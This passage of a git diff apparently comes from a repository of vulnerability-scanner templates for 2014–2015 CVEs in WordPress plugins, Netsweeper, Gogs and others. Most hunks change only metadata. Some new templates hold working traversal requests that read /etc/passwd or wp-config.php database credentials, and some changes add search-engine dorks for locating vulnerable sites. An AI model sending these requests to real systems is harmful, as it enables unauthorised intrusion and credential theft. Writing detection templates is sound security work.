+    - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4592
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wp-planet"
+  tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4940.yaml b/cves/2014/CVE-2014-4940.yaml
index 9fdac5089a..f485f7f869 100644
--- a/cves/2014/CVE-2014-4940.yaml
+++ b/cves/2014/CVE-2014-4940.yaml
@@ -7,8 +7,12 @@ info:
   description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4940
+    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=
+    - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/
   classification:
     cve-id: CVE-2014-4940
+  metadata:
+    google-query: inurl:"/wp-content/plugins/tera-charts"
   tags: cve,cve2014,wordpress,wp-plugin,lfi
 
 requests:
diff --git a/cves/2014/CVE-2014-4942.yaml b/cves/2014/CVE-2014-4942.yaml
new file mode 100644
index 0000000000..e1d2449c98
--- /dev/null
+++ b/cves/2014/CVE-2014-4942.yaml
@@ -0,0 +1,41 @@
+id: CVE-2014-4942
+
+info:
+  name: WP EasyCart - Information Disclosure
+  author: DhiyaneshDk
+  severity: low
+  description: |
+    The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
+  reference:
+    - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150
+    - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-4942
+  classification:
+    cve-id: CVE-2014-4942
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'
diff --git a/cves/2014/CVE-2014-5111.yaml b/cves/2014/CVE-2014-5111.yaml
index 14bdc7cf05..66b9614ad2 100644
--- a/cves/2014/CVE-2014-5111.yaml
+++ b/cves/2014/CVE-2014-5111.yaml
@@ -8,9 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/39351
     - https://nvd.nist.gov/vuln/detail/CVE-2014-5111
+    - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html
   classification:
     cve-id: CVE-2014-5111
-  tags: cve,cve2014,lfi,trixbox
+  tags: packetstorm,cve,cve2014,lfi,trixbox,edb
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-5258.yaml b/cves/2014/CVE-2014-5258.yaml
index 3179b75dc8..e1fefd393a 100644
--- a/cves/2014/CVE-2014-5258.yaml
+++ b/cves/2014/CVE-2014-5258.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-5258
     - https://www.exploit-db.com/exploits/34761
+    - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html
+    - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0
   classification:
     cve-id: CVE-2014-5258
-  tags: cve,cve2014,lfi
+  tags: edb,packetstorm,cve,cve2014,lfi
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-5368.yaml b/cves/2014/CVE-2014-5368.yaml
index c116159bd6..9c05358fa2 100644
--- a/cves/2014/CVE-2014-5368.yaml
+++ b/cves/2014/CVE-2014-5368.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
     - https://www.exploit-db.com/exploits/39287
-    - https://www.cvedetails.com/cve/CVE-2014-5368
+    - http://seclists.org/oss-sec/2014/q3/417
   classification:
     cve-id: CVE-2014-5368
-  tags: cve,cve2014,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/wp-source-control"
+  tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml
index 6af4f83381..c7a2413d59 100644
--- a/cves/2014/CVE-2014-6271.yaml
+++ b/cves/2014/CVE-2014-6271.yaml
@@ -4,9 +4,7 @@ info:
   name: ShellShock - Remote Code Execution
   author: pentest_swissky,0xelkomy
   severity: critical
-  description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment,
-    as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in
-    which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
+  description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-6271
     - https://nvd.nist.gov/vuln/detail/CVE-2014-7169
@@ -17,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2014-6271
     cwe-id: CWE-78
-  tags: cve,cve2014,rce,shellshock
+  tags: cve,cve2014,rce,shellshock,kev
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml
index 96a285cbc2..2664ce9906 100644
--- a/cves/2014/CVE-2014-6308.yaml
+++ b/cves/2014/CVE-2014-6308.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
     - https://nvd.nist.gov/vuln/detail/CVE-2014-6308
+    - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
+    - https://www.netsparker.com/lfi-vulnerability-in-osclass/
   classification:
     cve-id: CVE-2014-6308
-  tags: cve,cve2014,lfi
+  tags: cve,cve2014,lfi,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-8676.yaml b/cves/2014/CVE-2014-8676.yaml
new file mode 100644
index 0000000000..67fadfeeb3
--- /dev/null
+++ b/cves/2014/CVE-2014-8676.yaml
@@ -0,0 +1,34 @@
+id: CVE-2014-8676
+
+info:
+  name: Simple Online Planning Tool 1.3.2 - Directory Traversal
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
+  reference:
+    - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
+    - https://www.exploit-db.com/exploits/37604/
+    - http://seclists.org/fulldisclosure/2015/Jul/44
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2014-8676
+    cwe-id: CWE-22
+  tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml
index 604d129461..eecb69f728 100644
--- a/cves/2014/CVE-2014-8682.yaml
+++ b/cves/2014/CVE-2014-8682.yaml
@@ -3,23 +3,23 @@ id: CVE-2014-8682
 info:
   name: Gogs (Go Git Service) - SQL Injection
   author: dhiyaneshDK,daffainfo
-  severity: high
+  severity: critical
   description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-8682
     - http://seclists.org/fulldisclosure/2014/Nov/33
     - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
     - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
-    - http://www.exploit-db.com/exploits/35238
+    - https://www.exploit-db.com/exploits/35238
     - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2014-8682
     cwe-id: CWE-89
   metadata:
     shodan-query: title:"Sign In - Gogs"
-  tags: cve,cve2014,sqli,gogs
+  tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml
index 552634c3a9..68735c8d03 100644
--- a/cves/2014/CVE-2014-8799.yaml
+++ b/cves/2014/CVE-2014-8799.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
     - https://www.exploit-db.com/exploits/35346
-    - https://www.cvedetails.com/cve/CVE-2014-8799
+    - https://wordpress.org/plugins/dukapress/changelog/
   classification:
     cve-id: CVE-2014-8799
-  tags: cve,cve2014,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/dukapress"
+  tags: cve,cve2014,wordpress,wp-plugin,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml
index e792ca4df3..a28b8785e1 100644
--- a/cves/2014/CVE-2014-9094.yaml
+++ b/cves/2014/CVE-2014-9094.yaml
@@ -1,15 +1,20 @@
 id: CVE-2014-9094
 
 info:
-  name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
+  name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+    - http://websecurity.com.ua/7152/
+    - http://seclists.org/fulldisclosure/2014/Jul/65
+    - http://web.archive.org/web/20210615134835/https://www.securityfocus.com/bid/68525
   classification:
     cve-id: CVE-2014-9094
-  tags: cve,cve2014,wordpress,xss,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/dzs-videogallery"
+  tags: cve2014,wordpress,xss,wp-plugin,seclists,cve
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9119.yaml b/cves/2014/CVE-2014-9119.yaml
new file mode 100644
index 0000000000..eea1760029
--- /dev/null
+++ b/cves/2014/CVE-2014-9119.yaml
@@ -0,0 +1,39 @@
+id: CVE-2014-9119
+
+info:
+  name: WordPress DB Backup <=4.5 - Local File Inclusion
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+  reference:
+    - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
+    - https://www.exploit-db.com/exploits/35378
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-9119
+    - https://wpvulndb.com/vulnerabilities/7726
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2014-9119
+    cwe-id: CWE-22
+  tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/cves/2014/CVE-2014-9444.yaml b/cves/2014/CVE-2014-9444.yaml
index deab40780a..948b7d93e2 100644
--- a/cves/2014/CVE-2014-9444.yaml
+++ b/cves/2014/CVE-2014-9444.yaml
@@ -1,16 +1,18 @@
 id: CVE-2014-9444
 
 info:
-  name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
+  name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
   reference:
     - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9444
+    - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html
+    - http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/
   classification:
     cve-id: CVE-2014-9444
-  tags: cve,cve2014,wordpress,wp-plugin,xss
+  tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9606.yaml b/cves/2014/CVE-2014-9606.yaml
index db4a35b332..615077835d 100644
--- a/cves/2014/CVE-2014-9606.yaml
+++ b/cves/2014/CVE-2014-9606.yaml
@@ -4,18 +4,17 @@ info:
   name: Netsweeper 4.0.8 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server
-    parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php,
-    or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
+  description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9606
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-9606
     cwe-id: CWE-79
-  tags: cve,cve2014,netsweeper,xss
+  tags: cve2014,netsweeper,xss,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9607.yaml b/cves/2014/CVE-2014-9607.yaml
index 7913450fef..676c2def0f 100644
--- a/cves/2014/CVE-2014-9607.yaml
+++ b/cves/2014/CVE-2014-9607.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9607
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-9607
     cwe-id: CWE-79
-  tags: cve,cve2014,netsweeper,xss
+  tags: packetstorm,cve,cve2014,netsweeper,xss
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9608.yaml b/cves/2014/CVE-2014-9608.yaml
index f74ea0e5e3..b7bce998a1 100644
--- a/cves/2014/CVE-2014-9608.yaml
+++ b/cves/2014/CVE-2014-9608.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9608
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-9608
     cwe-id: CWE-79
-  tags: cve,cve2014,netsweeper,xss
+  tags: cve,cve2014,netsweeper,xss,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9609.yaml b/cves/2014/CVE-2014-9609.yaml
index d60e570b1a..a3be2897e2 100644
--- a/cves/2014/CVE-2014-9609.yaml
+++ b/cves/2014/CVE-2014-9609.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9609
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2014-9609
     cwe-id: CWE-22
-  tags: cve,cve2014,netsweeper,lfi
+  tags: cve2014,netsweeper,lfi,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9614.yaml b/cves/2014/CVE-2014-9614.yaml
index 264c7870d3..0936e0766c 100644
--- a/cves/2014/CVE-2014-9614.yaml
+++ b/cves/2014/CVE-2014-9614.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9614
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2014-9614
     cwe-id: CWE-798
-  tags: cve,cve2021,netsweeper,default-login
+  tags: cve,cve2014,netsweeper,default-login,packetstorm
 
 requests:
   - raw:
diff --git a/cves/2014/CVE-2014-9615.yaml b/cves/2014/CVE-2014-9615.yaml
index 1cf501ffc1..f787e8a2b6 100644
--- a/cves/2014/CVE-2014-9615.yaml
+++ b/cves/2014/CVE-2014-9615.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9615
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-9615
     cwe-id: CWE-79
-  tags: cve,cve2014,netsweeper,xss
+  tags: cve,cve2014,netsweeper,xss,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-9617.yaml b/cves/2014/CVE-2014-9617.yaml
index fadd68557c..f5ce9ecdde 100644
--- a/cves/2014/CVE-2014-9617.yaml
+++ b/cves/2014/CVE-2014-9617.yaml
@@ -8,22 +8,23 @@ info:
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9617
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-9617
     cwe-id: CWE-601
-  tags: cve,cve2014,netsweeper,redirect
+  tags: cve,cve2014,netsweeper,redirect,packetstorm
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/"
+      - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
 
 # Enhanced by mp on 2022/02/25
diff --git a/cves/2014/CVE-2014-9618.yaml b/cves/2014/CVE-2014-9618.yaml
index 5dc89cf317..7ae682bc94 100644
--- a/cves/2014/CVE-2014-9618.yaml
+++ b/cves/2014/CVE-2014-9618.yaml
@@ -9,12 +9,14 @@ info:
   reference:
     - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
     - https://nvd.nist.gov/vuln/detail/CVE-2014-9618
+    - https://www.exploit-db.com/exploits/37933/
+    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2014-9618
     cwe-id: CWE-287
-  tags: cve,cve2014,netsweeper,auth-bypass
+  tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml
index 7c0b5ddbbe..4689e2f4d3 100644
--- a/cves/2015/CVE-2015-0554.yaml
+++ b/cves/2015/CVE-2015-0554.yaml
@@ -1,16 +1,18 @@
 id: CVE-2015-0554
 
 info:
-  name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
+  name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
   author: daffainfo
   severity: high
-  description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
+  description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
   reference:
     - https://www.exploit-db.com/exploits/35721
+    - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html
     - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
+    - http://www.exploit-db.com/exploits/35721
   classification:
     cve-id: CVE-2015-0554
-  tags: cve,cve2015,pirelli,router,disclosure
+  tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/vulnerabilities/wordpress/candidate-application-lfi.yaml b/cves/2015/CVE-2015-1000005.yaml
similarity index 56%
rename from vulnerabilities/wordpress/candidate-application-lfi.yaml
rename to cves/2015/CVE-2015-1000005.yaml
index cdc97aa53a..d3f55c2a08 100644
--- a/vulnerabilities/wordpress/candidate-application-lfi.yaml
+++ b/cves/2015/CVE-2015-1000005.yaml
@@ -1,17 +1,21 @@
-id: candidate-application-lfi
+id: CVE-2015-1000005
 
 info:
   name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
   author: dhiyaneshDK
   severity: high
-  description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
+  description: |
+    WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
   reference:
     - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
+    - http://www.vapidlabs.com/advisory.php?v=142
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
-    cvss-score: 8.6
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-1000005
     cwe-id: CWE-22
-  tags: wordpress,wp-plugin,lfi,wp
+  tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
 
 requests:
   - method: GET
diff --git a/cves/2015/CVE-2015-1000010.yaml b/cves/2015/CVE-2015-1000010.yaml
new file mode 100644
index 0000000000..20be79142a
--- /dev/null
+++ b/cves/2015/CVE-2015-1000010.yaml
@@ -0,0 +1,36 @@
+id: CVE-2015-1000010
+
+info:
+  name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php  because no checks are made to authenticate users or sanitize input when determining file location.
+  reference:
+    - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
+    - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
+    - http://www.vapidlabs.com/advisory.php?v=147
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-1000010
+    cwe-id: CWE-22
+  tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml
index 8205281fcf..a50788f1cd 100644
--- a/cves/2015/CVE-2015-1000012.yaml
+++ b/cves/2015/CVE-2015-1000012.yaml
@@ -1,19 +1,24 @@
 id: CVE-2015-1000012
 
 info:
-  name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+  name: WordPress MyPixs <=0.3 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin
+  description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
   reference:
     - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+    - http://www.vapidlabs.com/advisory.php?v=154
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
+    - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2015-1000012
     cwe-id: CWE-200
-  tags: cve,cve2015,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/mypixs"
+  tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve
 
 requests:
   - method: GET
@@ -29,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/06
diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml
index 027ca9e210..2e3ed8377f 100644
--- a/cves/2015/CVE-2015-1427.yaml
+++ b/cves/2015/CVE-2015-1427.yaml
@@ -9,9 +9,10 @@ info:
     - https://blog.csdn.net/JiangBuLiu/article/details/94457980
     - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
